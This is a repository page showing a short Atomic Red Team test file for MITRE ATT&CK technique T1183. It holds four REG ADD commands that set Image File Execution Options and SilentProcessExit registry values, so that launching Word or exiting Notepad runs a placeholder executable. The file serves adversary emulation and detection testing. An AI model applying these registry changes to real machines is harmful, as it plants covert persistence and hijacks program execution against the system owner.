security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
7ef84e481520133a2cf394ecd4a3fb70ddb140bc
atomic-red-team/Windows/Persistence/Image_File_Execution_Options_Injection.md
T
api0cradle 92ab19d773 Created T1191 and T1183, added technique to T1060
2018-04-17 11:58:38 +02:00

16 lines
691 B
Markdown
Raw Blame History

# Image File Execution Options
MITRE ATT&CK Technique: [T1183](https://attack.mitre.org/wiki/Technique/T1183)
## Debugger
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe" /v Debugger /d "C:\folder\AtomicRedTeam.exe"
## GlobalFlags
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\folder\AtomicRedTeam.exe"
Reference in New Issue View Git Blame Copy Permalink